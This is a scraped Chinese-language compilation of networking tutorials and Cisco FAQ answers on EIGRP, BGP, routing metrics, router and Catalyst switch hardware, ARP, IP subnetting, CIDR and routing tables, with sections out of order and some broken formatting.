           注意使用IGRP和EIGRP的路由器广播hello报文来发现邻站，同时像OSPF一样交换路由更新信息。EIGRP为每一种网络层协议保存一张邻站表，它包括邻站的地址、在队列中等待发送的报文的数量、从邻站接收或向邻站发送报文需要的平均时间，以及在确定链接断开之前没有从邻站收到任何报文的时间。

           8、什么是自治系统？
           一个自治系统就是处于一个管理机构控制之下的路由器和网络群组。它可以是一个路由器直接连接到一个LAN上，同时也连到Internet上；它可以是一个由企业骨干网互连的多个局域网。在一个自治系统中的所有路由器必须相互连接，运行相同的路由协议，同时分配同一个自治系统编号。自治系统之间的链接使用外部路由协议，例如B
           G P。
           9、什么是BGP？
           BGP(Border
           GatewayProtocol)是一种在自治系统之间动态交换路由信息的路由协议。一个自治系统的经典定义是在一个管理机构控制之下的一组路由器，它使用IGP和普通度量值向其他自治系统转发报文。

           在BGP中使用自治系统这个术语是为了强调这样一个事实：一个自治系统的管理对于其他自治系统而言是提供一个统一的内部选路计划，它为那些通过它可以到达的网络提供了一个一致的描述。

           10、BGP支持的会话种类？
           BGP相邻路由器之间的会话是建立在TCP协议之上的。TCP协议提供一种可靠的传输机制，支持两种类型的会话：
           o 外部BGP（EBGP）：是在属于两个不同的自治系统的路由器之间的会话。这些路由器是毗邻的，共享相同的介质和子网。
           o
           内部BGP（IBGP）：是在一个自治系统内部的路由器之间的会话。它被用来在自治系统内部协调和同步寻找路由的进程。BGP路由器可以在自治系统的任何位置，甚至中间可以相隔数个路由器。

           注意"初始的数据流的内容是整个BGP路由表。但以后路由表发生变化时，路由器只传送变化的部分。BGP不需要周期性地更新整个路由表。因此，在连接已建立的期间，一个BGP发送者必须保存有当前所有同级路由器共有的整个BGP路由表。BGP路由器周期性地发送Keep
           Alive消息来确认连接是激活的。当发生错误或特殊情况时，路由器就发送Notification消息。当一条连接发生错误时，会产生一个notification消息并断开连接。"-来自RFC11654、BGP*作。

           11、BGP允许路由再分配吗？
           允许。因为BGP主要用来在自治系统之间进行路由选择，所以它必须支持RIP、OSPF和
           IGRP的路由选择表的综合，以便将它们的路由表转入一个自治系统。BGP是一个外部路由协议，因此它的*作与一个内部路由协议不同。在BGP中，只有当一条路由已经存在于IP路由表中时，才能用NETWORK命令在BGP路由表中创建一条路由。

           12、如何显示在数据库中的所有BGP路由？
           要显示数据库中的所有BGP路由，只需在EXEC命令行下输入：
           show ip bgp paths
           这个命令的输出可能是：
           Address Hash Refcount MetricPath
           0 x 2 9 7 A 9 C 0 2 0 i
           13、什么是水平分割？
           水平分割是一种避免路由环的出现和加快路由汇聚的技术。由于路由器可能收到它自己发送的路由信息，而这种信息是无用的，水平分割技术不反向通告任何从终端收到的路由更新信息，而只通告那些不会由于计数到无穷而清除的路由。

           14、路由环是如何产生的？
           由于网络的路由汇聚时间的存在，路由表中新的路由或更改的路由不能够很快在全网中稳定，使得有不一致的路由存在，于是会产生路由环。
           15、什么是度量值？
           度量值代表距离。它们用来在寻找路由时确定最优路由。每一种路由算法在产生路由表时，会为每一条通过网络的路径产生一个数值（度量值），最小的值表示最优路径。度量值的计算可以只考虑路径的一个特性，但更复杂的度量值是综合了路径的多个特性产生的。一些常用的度量值有：

           ◎跳步数：报文要通过的路由器输出端口的个数。
           ◎Ticks：数据链路的延时（大约1/18每秒）。
           ◎代价：可以是一个任意的值，是根据带宽，费用或其他网络管理者定义的计算方法得到的。
           ◎带宽：数据链路的容量。
           ◎时延：报文从源端传到目的地的时间长短。
           ◎负载：网络资源或链路已被使用的部分的大小。
           ◎可靠性：网络链路的错误比特的比率。
           ◎最大传输单元（MTU）：在一条路径上所有链接可接受的最大消息长度（单位为字节）。
           IGRP使用什么类型的路由度量值？这个度量值由什么组成？
           IGRP使用多个路由度量值。它包括如下部分：
           ◎带宽：源到目的之间最小的带宽值。
           ◎时延：路径中积累的接口延时。
           ◎可靠性：源到目的之间最差的可能可靠性，基于链路保持的状态。
           ◎负载：源到目的之间的链路在最坏情况下的负载，用比特每秒表示。
           ◎MTU：路径中最小的M T U值。
           16、度量值可以修改或调整吗？
           加一个正的偏移量。这个命令的完整结构如下：可以使用OFFSET-LIST ROUTER子命令
           为访问表中的网络输入和输出度量值添加一个正的偏移量。
           offset-list {in|out} offset [access-list] no offset-list {in|out}
           offset [access-list]
           如果参数LIST的值是0，那么OFFSET参数将添加到所有的度量值。如果OFFSET的值是0，那么就没有任何作用。对于IGRP来说，偏移量的值只加到时延上。这个子命令也适用于RIP和hello路由协议。

           使用带适当参数的NO OFFSET- LIST命令可以清除这个偏移量。
           在以下的例子中，一个使用IGRP的路由器在所有输出度量值的时延上加上偏移量10： offset-list out 10
           下面是一个将相同的偏移量添加到访问表121上的例子：
           offset-list out 10 121
           17、每个路由器在寻找路由时需要知道哪五部分信息？
           所有的路由器需要如下信息为报文寻找路由：
           ◎目的地址：报文发送的目的主机。
           ◎邻站的确定：指明谁直接连接到路由器的接口上。
           ◎路由的发现：发现邻站知道哪些网络。
           ◎选择路由：通过从邻站学习到的信息，提供最优的（与度量值有关）到达目的地的路径。
           ◎保持路由信息：路由器保存一张路由表，它存储所知道的所有路由信息。
           18、Cisco路由器支持的路由协议与其他厂家设备的协议兼容吗？
           除了IGRP和EIGRP，Cisco路由器支持的所有路由协议都与其他厂家实现的相同协议兼容。IGRP和EIGRP是Cisco的专利产品。

           19、RIP路由表的表项的信息说明了什么？
           RIP路由表的每一个表项都提供了一定的信息，包括最终目的地址、到目的地的下一跳地址和度量值。这个度量值表示到目的终端的距离（跳步数）。其他的信息也可以包括。

           路由器问题补充：
           1、Cisco3600系列路由器目前是否支持广域网接口卡WIC-2T和WIC-2A/S？
           Cisco3600系列路由器在12.007XK及以上版本支持WIC-2T和WIC-2A/S这两种广域网接口卡。
           但是需要注意的是：
           只有快速以太网混合网络模块能够支持这两种广域网接口卡。
           支持这两种接口卡的网络模块如下所示：
           NM-1FE2W， NM-2FE2W， NM-1FE1R2W， NM-2W。
           而以太网混合网络模块不支持，如下所示：
           NM-1E2W，NM-2E2W， NM1E1R2W。
           2、Cisco3600系列路由器的NM(4A/S，NM(8A/S网络模块和WIC(2A/S广域网接口卡支持的最大异/同步速率各是多少？
           这些网络模块和广域网接口卡既能够支持异步，也能够支持同步。支持的最大异步速率均为115.2Kbps，最大同步速率均为128Kbps。
           3、WIC-2T与WIC-1T的电缆各是哪种？
           WIC-1T：DB60转V35或RS232、 449等电缆。 如：CAB-V35-MT。
           WIC-2T：SMART型转V35或RS232、 449等电缆。 如： CAB-SS-V35-MT。
           4、Cisco 7000系列上的MCE1与Cisco 2600/3600上的E1、 CE1有什么区别？
           Cisco 7000上的MCE1可配置为E1、 CE1， 而Cisco 2600/3600上的E1、 CE1仅支持自己的功能。
           5、Cisco 2600系列路由器，是否支持VLAN间路由，对IOS软件有何需求？
           Cisco(2600系列路由器中，只有Cisco2620和Cisco2621可以支持VLAN间的
           路由(百兆端口才支持VLAN间路由)。并且如果支持VLAN间路由，要求IOS软件必须包括IP Plus特性集。
           6、Cisco3660路由器与3620/3640路由器相比在硬件上有那些不同？
           不同点如下：
           *
           Cisco3660路由器基本配置包括1或2个10/100M自适应快速以太网接口；而Cisco3620/3640基本配置中不包括以太网接口。

           * Cisco3660路由器支持网络模块热插拔，而 Cisco3620/3640不支持网络模块热插拔。
           * Cisco3660的冗余电源为内置， 而Cisco3620/3640的冗余电源为外置的。
           7、为什么3640不能识别NM-1FE2W？
           需要将IOS升级到12.0.7T
           交换机问题
           关于交换机问题：
           1、Catalyst 35500XL/2950XL的堆叠是如何实现的？
           a. 需要使用专门的堆叠电缆，1米长或50厘米长(CAB-GS-1M或CAB-GS-50CM)以及专门的千兆堆叠卡GigaStack
           GBIC (WS-X3550-XL) (该卡已含CAB-GS-50CM 堆叠电缆)。
           b. 可以选用2种堆叠方法：菊花链法(提供1G的带宽)或点对点法(提供 2G的带宽)。
           c. 2种方法都可以做备份。
           d. 菊花链法最多可支持9台交换机的堆叠， 点对点法最多可支持8台。
           2、Catalyst 3550 XL系列交换机做堆叠时，是否支持冗余备份？
           Catalyst3550XL系列交换机的堆叠有两种实现方法：菊花链方式和点到点方式。
           当使用菊花链方式时，堆叠的交换机依次连接，交换机之间可以达到1Gbps的传输带宽；
           当使用点到点方式时，需要一台单独的 Catalyst3508G-XL交换机，
           其余的交换机通过堆叠GBIC卡和堆叠线缆与3508G相连，这种方法最大可以达到2Gbps的全双工传输带宽。
           这两种方法都分别支持堆叠的冗余连接。当使用菊花链连接方式时，冗余连接是通过将最上面的交换机与最下面的交换机用堆叠线缆相连接完成的。而当使用点到点连接时，是通过使用第2台3508交换机来完成的。

           4、 Catalyst3550 XL的一个千兆口使用堆叠卡做堆叠后， 另外一个千兆口是否可以连接千兆的交换机或千兆的服务器？
           可以。需使用1000Base-SX GBIC或1000Base-LX/LH GBIC。
           5、 Ethernet Channel Tech. 可以应用在什么网络设备之间？如何使用？
           可以应用在交换机之间， 交换机和路由器之间，交换机和服务器之间
           可以将2个或4个10/100Mbps或1000Mbps端口使用 Ethernet Channel
           Tech.，达到最多400M(10/100Mbps端口)、4G(1000Mbps端口)
           或800M(10/100Mbps端口)、8G(1000Mbps端口) 的带宽。
           6、Ethernet Channel Technology有什么作用？
           增加带宽，负载均衡，线路备份
           7、 当端口设置成 Ethernet Channel时，如何选择线路？
           根据数据帧的以太网源地址和目的地址最后1位或2位做或运算，决定从哪条链路输出。对于路由器来说是根据网络地址做或运算，以决定链路的输出。
           8、Ethernet Channel Technology 与 PAgP (Port Aggregation Protocol )
           的区别？
           PAgP是 Ethernet Channel的增强版，它支持在 Ethernet Channel 上的 Spanning Tree
           Protocol和Uplink Fast，并支持自动配置 Ethernet Channel 的捆绑。
           最少需要的电源数 1 2
           包转发速率 18Mpps 18Mpps
           背板带宽 24Gbps 60Gbps
           9、Catalyst4000系列是否支持ISL？
           从Supervisor Engine Software Release 5.1开始支持。
           10、Catalyst4000交换机的冗余电源选项4008/2和4008/3有何区别？
           Catalyst4003交换机机箱上有两个电源插槽，出厂时本身自带一个电源，4008/2是专为其定制的冗余电源。Catalyst4006的机箱上有三个电源插槽，出厂时带有2个电源供电，4008/3是为其定制的专用冗余电源。

           11、Catalyst 4006的三层交换模块是否不含以太网端口?
           不，Catalyst4006的三层交换模块含有32个10/100自适应端口和2个千兆端口。
           在4003上使用时可替代原有的WS-X4232-GB-RJ模块， 从而不影响网络结构。
           12、Catalyst 4000系列模块化交换机使用千兆交换模块时， 如何选用目前存在的两种交换模块(产品编号如下)？
           WS-X4306-GB Catalyst 4000 Gigabit Ethernet Module, 6-Ports (GBIC)
           WS-X4418-GB Catalyst 4000 GE Module, Server Switching 18-Ports
           (GBIC)
           这两个模块的使用环境不同
           WS-X4306-GB是一个6口的千兆交换模块，每个端口独占千兆的带宽，适合做网络的主干，用来连接具有千兆接口的交换机；也可以与具有千兆网卡的服务器相连。

           WS-X4418-GB
           是一个18口的千兆交换模块，其中有两个口是独占千兆的带宽，另外16个口共享8G的全双工的带宽，但每个端口可以突发到千兆。此模块适合在服务器比较集中的地方连接千兆的服务器，而不适合连接网络主干。

           13、Catalyst 6000系列的背板带宽和包转发速率各为多少？
           Catalyst 6500系列的背板带宽可扩展到256Gbps， 包转发速率可扩展到150Mpps； Catalyst
           6000系列作为一个经济有效的解决方案可提供到32Gbps的背板带宽和15Mpps的包转发速率。
           14、Catalyst 6000系列的MSFC 要求多少M DRAM ？
           Catalyst 6000系列IOS软件存放在MSFC里， MSFC要求有128M DRAM。 缺省配置已含128M DRAM。
           15、Catalyst 6000系列上的插槽是否有限制?
           除第一个插槽专用于引擎， 第二个插槽可用于备份引擎或线卡， 其它插槽都用于线卡。
           16、Catalyst 6000系列有几种引擎？
           Catalyst 6000系列的引擎分为Supervisor Engine 1和Supervisor Engine 1A两种， 其中
           Supervisor Engine 1A 有两个特定的备份引擎。其型号分别如下： 型号 描述
           WS-X6K-SUP1-2GE Catalyst 6000 Supervisor Engine1引擎 含两个千兆端口(需购GBIC)
           WS-X6K-SUP1A-2GE Catalyst 6000 Supervisor Engine1A引擎 加强的QOS特性，
           含两个千兆端口(需购GBIC)
           WS-X6K-SUP1A-PFC Catalyst 6000 Supervisor Engine1A引擎
           含两个千兆端口(需购GBIC)和PFC卡
           WS-X6K-S1A-PFC/2 Catalyst 6000 Supervisor Engine1A冗余引擎
           含两个千兆端口(需购GBIC)和PFC卡
           WS-X6K-SUP1A-MSFC Catalyst 6000 Supervisor Engine1A引擎
           含两个千兆端口(需购GBIC)和MSFC、 PFC卡
           WS-X6K-S1A-MSFC/2 Catalyst 6000 Supervisor Engine1A冗余引擎，
           含两个千兆端口(需购GBIC)和MSFC、 PFC卡
           17、Catalyst 6000系列上备份引擎与主引擎必须是一致的吗？
           是的。 Catalyst 6000系列的备份引擎与主引擎必须是一致的，
           例如， 不能将不带MSFC&PFC的引擎给带MSFC&PFC的引擎作备份。
           另外， WS-X6K-SUP1A-PFC 和 WS-X6K-SUP1A-MSFC有专门的备份引擎。
           主、备引擎的对应关系如下：
           主引擎 备份引擎
           WS-X6K-SUP1-2GE WS-X6K-SUP1-2GE
           WS-X6K-SUP1A-2GE WS-X6K-SUP1A-2GE
           WS-X6K-SUP1A-PFC WS-X6K-S1A-PFC/2
           WS-X6K-SUP1A-MSFC WS-X6K-S1A-MSFC/2
           18、Catalyst 6000系列支持的路由协议有哪些？
           Catalyst 6000系列支持的路由协议有：OSPF， IGRP， EIGRP， BGP4， IS-IS， RIP和RIP II；
           对于组播PIM支持sparse和dense两种模式；
           支持的非 IP 路由协议有： NLSP， IPX RIP/SAP， IPX EIGRP， RTMP， Apple Talk
           EIGRP和DECnet Phase IV和V。
           19、Catalyst 6000系列支持的网络协议有哪些？
           MSM上支持 6Mpps 的 IP、 IP 组播和 IPX 。 引擎上的MSFC 支持 15Mpps的 IP、 IP 组播、IPX以及
           AppleTalk、 VINEs、 DECnet.
           20、Catalyst6000上若引擎为SUP-1A-2GE， 怎么实现三层交换的功能？
           用MSM实现。 6000上只有含有MSFC的引擎才能通过MSFC实现三层交换功能， 在6000上， MSFC是不能单独订购的。
           21、Catalyst? 6000交换机和Catalyst? 6500交换机有何区别？6000交换机是否可以升级到6500交换机？
           Catalyst?
           6000系列交换机的背板带宽为32G，而6500系列交换机的背板带宽最大可以扩展到256G。由于这两个系列的交换机使用的背板总线结构不同，所以6000交换机不能升级到6500系列交换机。

           但这两个系列交换机使用相同的交换模块。
           22、Catalyst3508G是否也可以同Catalyst3524一样采用菊花链堆叠模式？
           完全可以。
           23、在交换机之间配置Uplink-Fast时，是否需要关闭原有Spanning-Tree选项？
           不需要，Uplink-Fast实际上使用的是一种简化的Spanning-Tree算法，
           与标准的Spanning-Tree兼容，因此不需关闭该功能。


路由器 <二>

《一键清理系统垃圾》

路由器 <二>

二、连接网络层与数据链路层
    网络层下面是数据链路层，为了它们可以互通，需要“粘合”协议。ARP（地址解析协议）用于把网络层(3层)地址映射到数据链路层(2层)地址，RARP(反向地址解析协议)则反之。

    虽然ARP的定义与网络层协议无关，但它通常用于解析IP地址；最常见的数据链路层是以太网。因此下面的ARP和RARP的例子基于IP和以太网，但要注意这些概念对其他协议也是一样的。

1、地址解析协议
    网络层地址是由网络管理员定义的抽象映射，它不去关心下层是哪种数据链路层协议。然而，网络接口只能根据2层地址来互相通信，2层地址通过ARP从3层地址得到。

    并不是发送每个数据包都需要进行ARP请求，回应被缓存在本地的ARP表中，这样就减少了网络中的ARP包。ARP的维护比较容易，是一个比较简单的协议。

2、简介
    如果接口A想给接口B发送数据，并且A只知道B的IP地址，它必须首先查找B的物理地址，它发送一个含有B的IP地址的ARP广播请求B的物理地址，接口B收到该广播后，向A回应其物理地址。

    注意，虽然所有接口都收到了信息，但只有B回应该请求，这保证了回应的正确且避免了过期的信息。要注意的是，当A和B不在同一网段时，A只向下一跳的路由器发送ARP请求，而不是直接向B发送。

    下图为接收到ARP分组后的处理，注意发送者的<IP address, hardware address>对被存到接收ARP请求的主机的本地ARP表中，一般A想与B通信时，B可能也需要与A通信。

3、IP地址冲突

    ARP产生的问题中最常见的是IP地址的冲突，这是由于两个不同的主机IP地址相同产生的，在任何互联的网络中，IP地址必须是唯一的。这时会收到两个ARP回应，分别指出了不同的硬件地址，这是严重的错误，没有简单的解决办法。

    为了避免出现这类错误，当接口A初试化时，它发送一个含有其IP地址的ARP请求，如果没有收到回应，A就假定该IP地址没有被使用。我们假定接口B已经使用了该IP地址，那么B就发送一个ARP回应，A就可以知道该IP地址已被使用，它就不能再使用该IP地址，而是返回错误信息。这样又产生一个问题，假设主机C含有该IP地址的映射，是映射到B的硬件地址的，它收到接口A的ARP广播后，更新其ARP表使之指向A的硬件地址。为了解决这个错误，B再次发送一个ARP请求广播，这样主机C又更新其ARP表再次指向B的硬件地址。这时网络的状态又回到先前的状态，有可能C已经向A发送了应该发送给B的IP分组，这很不幸，但是因为IP提供的是无保证的传输，所以不会产生大的问题。

4、管理ARP缓存表

    ARP缓存表是<IP地址，硬件地址>对的列表，根据IP地址索引。该表可以用命令arp来管理，其语法包括：

向表中添加静态表项 -- arp -s <IP address> <hardware address>

从表中删除表项 -- arp -d <IP address>

显示表项 -- arp -a

    ARP表中的动态表项(没有手动加入的表项)通常过一段时间自动删除，这段时间的长度由特定的TCP/IP实现决定。

5、静态ARP地址的使用

    静态ARP地址的典型使用是设置独立的打印服务器，这些设备通常通过telnet来配置，但首先它们需要一个IP地址。没有明显的方法来把此信息告诉该设备，好象只能使用其串口来设置。但是，这需要找一个合适的终端和串行电缆，设置波特率、奇偶校验等，很不方便。

    假设我们想给一个打印服务器设置IP地址P-IP，并且我们知道其硬件地址P-hard，在工作站A上创建一个静态ARP表项把P-IP映射到P-hard，这样，虽然打印服务器不知道自己的IP地址，但是所有指向P-IP的数据就将被送到P-hard。我们现在就可以telnet到P-IP并配置其IP地址了，然后再删除该静态ARP表项。

    有时会在一个子网里配置打印服务器，而在另一个子网里使用它，方法与上面类似。假设其IP地址为P-IP，我们分配一个本网的临时IP地址T-IP给它，在工作站A上创建临时ARP表项把T-IP映射到P-hard，然后telnet到T-IP，给打印服务器配以IP地址P-IP。接下来就可以把它放到另一个子网里使用了，别忘了删除静态ARP表项。

6、代理ARP

    可以通过使用代理ARP来避免在每台主机上配置路由表，在使用子网时这特别有用，但注意，不是所有的主机都能理解子网的。基本的思想是即使对于不在本子网的主机也发送ARP请求，ARP代理服务器（通常是网关）回应以网关的硬件地址，见下图，注意与上面的图比较一下。

    代理ARP简化了主机的管理，但是增加了网络的通信量(不是很明显)，并且可能需要较大的ARP缓存，每个不在本网的IP地址都被创建一个表项，都映射到网关的硬件地址。在使用代理ARP的主机看来，世界就象一个大的没有路由器物理网络。

返回


路由器 <三>

《一键清理系统垃圾》

路由器 <三>

三、IP地址
    在可路由的网络层协议中，协议地址必须含有两部分信息：网络地址和主机地址。存贮这种信息最明显的方法是用两个分离的域，这样我们必须考虑到两个域的最大长度，有些协议(如IPX)就是这样的，它在小型和中型的网络里可以工作的很好。

    另一种方案是减少主机地址域的长度，如24位网络地址、8位主机地址，这样就有了较多的网段，但每个网段内的主机数目很少。这样一来，对于多于256个主机的网络，就必须分配多个网段，其问题是很多的网络给路由器造成了难以忍受的负担。

    IP把网络地址和主机地址一起包装在一个32位的域里，有时主机地址部分很短，有时很长，这样可以有效利用地址空间，减少IP地址的长度，并且网络数目不算多。有两种将主机地址分离出来的方法：基于类的地址和无类别的地址。

1、主机和网关

    主机和网关的区别常产生混淆，这是由于主机意义的转变。在RFC中(1122/3和1009)中定义为：

主机是连接到一个或多个网络的设备，它可以向任何一个网络发送和从其接收数据，但它从不把数据从一个网络传向另一个。

网关是连接到多于一个网络的设备，它选择性的把数据从一个网络转发到其它网络。

    换句话说，过去主机和网关的概念被人工地区分开来，那时计算机没有足够的能力同时用作主机和网关。主机是用户工作的计算机，或是文件服务器等。现代的计算机的能力足以同时担当这两种角色，因此，现代的主机定义应该如此： 主机是连接到一个或多个网络的设备，它可以向任何一个网络发送和从其接收数据。它也可以作为网关，但这不是其唯一的目的。

    路由器是专用的网关，其硬件经过特殊的设计使其能以极小的延迟转发大量的数据。然而，网关也可以是有多个网卡的标准的计算机，其操作系统的网络层有能力转发数据。由于专用的路由硬件较便宜，计算机用作网关已经很少见了，在只有一个拨号连接的小站点里，还可能使用计算机作为非专用的网关。

2、基于类的地址
    最初设计IP时，地址根据第一个字节被分成几类：

0: 保留
1-126: A类(网络地址:1字节，主机地址:3字节)
127: 保留
128-191: B类(网络地址:2字节，主机地址:2字节)
192-223: C类(网络地址:3字节，主机地址:1字节)
224-255: 保留

3、子网划分
    虽然基于类的地址系统对因特网服务提供商来说工作得很好，但它不能在一个网络内部做任何路由，其目的是使用第二层(桥接/交换)来导引网络中的数据。在大型的A类网络中，这就成了个特殊的问题，因为在大型网络中仅使用桥接/交换使其非常难以管理。在逻辑上其解决办法是把大网络分割成若干小的网络，但在基于类的地址系统中这是不可能的。为了解决这个问题，出现了一个新的域：子网掩码。子网掩码指出地址中哪些部分是网络地址，哪些是主机地址。在子网掩码中，二进制1表示网络地址位，二进制0表示主机地址位。传统的各类地址的子网掩码为：

A类：255.0.0.0

B类：255.255.0.0

C类：255.255.255.0

    如果想把一个B类网络的地址用作C类大小的地址，可以使用掩码255.255.255.0。

    用较长的子网掩码把一个网络分成多个网络就叫做划分子网。要注意的是，一些旧软件不支持子网，因为它们不理解子网掩码。例如UNIX的routed路由守护进程通常使用的路由协议是版本1的RIP，它是在子网掩码出现前设计的。

    上面只介绍了三种子网掩码：255.0.0.0、255.255.0.0和255.255.255.0，它们是字节对齐的子网掩码。但是也可以在字节中间对其进行划分，这里不进行详细讲解，请参照相关的TCP/IP书籍。

    子网使我们可以拥有新的规模的网络，包括很小的用于点到点连接的网络（如掩码255.255.255.252，30位的网络地址，2位的主机地址：两个主机的子网），或中型网络（如掩码255.255.240.0，20位网络地址，12位主机地址：4094个主机的子网）。

    注意DNS被设计为只允许字节对齐的IP网络(在in-addr.arpa.域中)。

4、超网(supernetting)

    超网是与子网类似的概念--IP地址根据子网掩码被分为独立的网络地址和主机地址。但是，与子网把大网络分成若干小网络相反，它是把一些小网络组合成一个大网络--超网。

    假设现在有16个C类网络，从201.66.32.0到201.66.47.0，它们可以用子网掩码255.255.240.0统一表示为网络201.66.32.0。但是，并不是任意的地址组都可以这样做，例如16个C类网络201.66.71.0到201.66.86.0就不能形成一个统一的网络。不过这其实没关系，只要策略得当，总能找到合适的一组地址的。

5、可变长子网掩码(VLSM)

    如果你想把你的网络分成多个不同大小的子网，可以使用可变长子网掩码，每个子网可以使用不同长度的子网掩码。例如：如果你按部门划分网络，一些网络的掩码可以为255.255.255.0(多数部门)，其它的可为255.255.252.0(较大的部门)。

6、无类别地址(CIDR)

    因特网上的主机数量增长超出了原先的设想，虽然还远没达到232，但地址已经出现匮乏。1993年发表的RFC1519--无类别域间路由CIDR(Classless Inter-Domain Routing)--是一个尝试解决此问题的方法。CIDR试图延长IPv4的寿命，与128位地址的IPv6不同，它并不能最终解决地址空间的耗尽，但IPv6的实现是个庞大的任务，因特网目前还没有做好准备。CIDR给了我们缓冲的准备时间。

    基于类的地址系统工作的不错，它在有效的地址使用和少量的网络数目间做出了较好的折衷。但是随着因特网意想不到的成长出现了两个主要的问题：

已分配的网络数目的增长使路由表大得难以管理，相当程度上降低了路由器的处理速度。

僵化的地址分配方案使很多地址被浪费，尤其是B类地址十分匮乏。

    为了解决第二个问题，可以分配多个较小的网络，例如，用多个C类网络而不是一个B类网络。虽然这样能够很有效地分配地址，但是更加剧了路由表的膨胀（第一个问题）。

    在CIDR中，地址根据网络拓扑来分配。连续的一组网络地址可以被分配给一个服务提供商，使整组地址作为一个网络地址（很可能使用超网技术）。例如：一个服务提供商被分配以256个C类地址，从213.79.0.0到213.79.255.0，服务提供商给每个用户分配一个C类地址，但服务提供商外部的路由表只通过一个表项--掩码为255.255.0.0的网络213.79.0.0--来分辨这些路由。

    这种方法明显减少了路由表的增长，CIDR RFC的作者估计，如果90%的服务提供商使用了CIDR，路由表将以每3年54%的速度增长，而如果没有使用CIDR，则增长速度为776%。如果可以重新组织现有的地址，则因特网骨干上的路由器广播的路由数量将大大减少。但这实际是不可行的，因为将带来巨大的管理负担。

返回


路由器 <四>

《一键清理系统垃圾》

路由器 <四>

四、路由

1、路由表
    如果一个主机有多个网络接口，当向一个特定的IP地址发送分组时，它怎样决定使用哪个接口呢？答案就在路由表中。来看下面的例子：

目的 子网掩码 网关 标志 接口
201.66.37.0 255.255.255.0 201.66.37.74 U eth0
201.66.39.0 255.255.255.0 201.66.39.21 U eth1

    主机将所有目的地为网络201.66.37.0内主机(201.66.37.1-201.66.37.254)的数据通过接口eth0(IP地址为201.66.37.74)发送，所有目的地为网络201.66.39.0内主机的数据通过接口eth1(IP地址为201.66.39.21)发送。标志U表示该路由状态为“up”（即激活状态）。对于直接连接的网络，一些软件并不象上例中一样给出接口的IP地址，而只列出接口。

    此例只涉及了直接连接的主机，那么目的主机在远程网络中如何呢？如果你通过IP地址为201.66.37.254的网关连接到网络73.0.0.0，那么你可以在路由表中增加这样一项：

目的73.0.0.0
掩码255.0.0.0
网关201.66.37.254
标志UG
接口eth0
    此项告诉主机所有目的地为网络73.0.0.0内主机的分组通过201.66.37.254路由过去。标志G(gateway)表示此项把分组导向外部网关。类似的，也可以定义通过网关到达特定主机的路由，增加标志H(host)：

目的 掩码 网关 标志 接口
91.32.74.21 255.255.255.255 201.66.37.254 UGH eth0

    下面是路由表的基础，除了特殊表项之外：

目的 掩码 网关 标志 接口
127.0.0.1 255.255.255.255 127.0.0.1 UH lo0
default 0.0.0.0 201.66.37.254 UG eth1

  第一项是loopback接口，用于主机给自己发送数据，通常用于测试和运行于IP之上但需要本地通信的应用。这是到特定地址127.0.0.1的主机路由(接口lo0是IP协议栈内部的“假”网卡)。第二项十分有意思，为了防止在主机上定义到因特网上每一个可能到达网络的路由，可以定义一个缺省路由，如果在路由表中没有与目的地址相匹配的项，该分组就被送到缺省网关。多数主机简单地通过一个网卡连接到网络，因此只有通过一个路由器到其它网络，这样在路由表中只有三项：loopback项、本地子网项和缺省项（指向路由器）。

2、重叠路由

    假设在路由表中有下列重叠项：

目的 掩码 网关 标志 接口
1.2.3.4 255.255.255.255 201.66.37.253 UGH eth0
1.2.3.0 255.255.255.0 201.66.37.254 UG eth0
1.2.0.0 255.255.0.0 201.66.37.253 UG eth1
default 0.0.0.0 201.66.39.254 UG eth1

  之所以说这些路由重叠是因为这四个路由都含有地址1.2.3.4，如果向1.2.3.4发送数据，会选择哪条路由呢？在这种情况下，会选择第一条路由，通过网关201.66.37.253。原则是选择具有最长(最精确)的子网掩码。类似的，发往1.2.3.5的数据选择第二条路由。

    注意：这条原则只适用于间接路由(通过网关)。把两个接口定义在同一子网在很多软件实现上是非法的。例如下面的设置通常是非法的（不过有些软件将尝试在两个接口进行负载平衡）：

接口 IP地址 子网掩码
eth0 201.66.37.1 255.255.255.0
eth1 201.66.37.2 255.255.255.0

    对于重叠路由的策略是十分有用的，它允许缺省路由作为目的为0.0.0.0、子网掩码为0.0.0.0的路由进行工作，而不需要作为路由软件的一个特殊情况来实现。

    回头来看看CIDR，仍使用上面的例子：一个服务提供商被赋予256个C类网络，从213.79.0.0到213.79.255.0。该服务提供商外部的路由表只以一个表项就了解了所有这些路由：213.79.0.0，子网掩码为255.255.0.0。假设一个用户移到了另一个服务提供商，他拥有网络地址213.79.61.0，现在他是否必须从新的服务提供商处取得新的网络地址呢？如果是，意味着他必须重新配置每台主机的IP地址，改变DNS设置，等等。幸运的是，解决办法很简单，原来的服务提供商保持路由213.79.0.0(子网掩码为255.255.0.0)，新的服务提供商则广播路由213.79.61.0(子网掩码为255.255.255.0)，因为新路由的子网掩码较长，它将覆盖原来的路由。

3、静态路由

回头看看我们已建立的路由表，已有了六个表项：

目的　 -掩码-　　网关-　　 标志-　 接口
127.0.0.1- 255.255.255.255- 127.0.0.1- UH lo0
201.66.37.0 -255.255.255.0- 201.66.37.74- U eth0
201.66.39.0 -255.255.255.0 -201.66.39.21- U eth1
default -0.0.0.0- 201.66.39.254- UG eth1
73.0.0.0- 255.0.0.0- 201.66.37.254 -UG eth0
91.32.74.21- 255.255.255.255- 201.66.37.254- UGH eth0

  该网络图示如下：

    这些表项分别是怎么得到的呢？第一个是当路由表初始化时由路由软件加入的，第二、三个是当网卡绑定IP地址时自动创建的，其余三个必须手动加入，在UNIX系统中，这是通过命令route来做的，可以由用户手工执行，也可以通过rc脚本在启动时执行。上述方法涉及的是静态路由，通常在启动时创建，并且没有手工干预的话将不再改变。

返回


路由器 <一>

《一键清理系统垃圾》

路由器 <一>

    最简单的网络可以想象成单线的总线，各个计算机可以通过向总线发送分组以互相通信。但随着网络中的计算机数目增长，这就很不可行了，会产 生许多问题：

1、带宽资源耗尽。
2、每台计算机都浪费许多时间处理无关的广播数据。
3、网络变得无法管理，任何错误都可能导致整个网络瘫痪。
4、每台计算机都可以监听到其他计算机的通信。

    把网络分段可以解决这些问题，但同时你必须提供一种机制使不同网段的计算机可以互相通信，这通常涉及到在一些ISO网络协议层选择性地在网段间传送数据，我们来看一下网络协议层和路由器的位置。

    我们可以看到，路由器位于网络层。本文假定网络层协议为IPv4，因为这是最流行的协议，其中涉及的概念与其他网络层协议是类似的。

一、路由与桥接
    路由相对于2层的桥接/交换是高层的概念，不涉及网络的物理细节。在可路由的网络中，每台主机都有同样的网络层地址格式（如IP地址），而无论它是运行在以太网、令牌环、FDDI还是广域网。网络层地址通常由两部分构成：网络地址和主机地址。

    网桥只能连接数据链路层相同（或类似）的网络，路由器则不同，它可以连接任意两种网络，只要主机使用的是相同的网络层协议。

返回


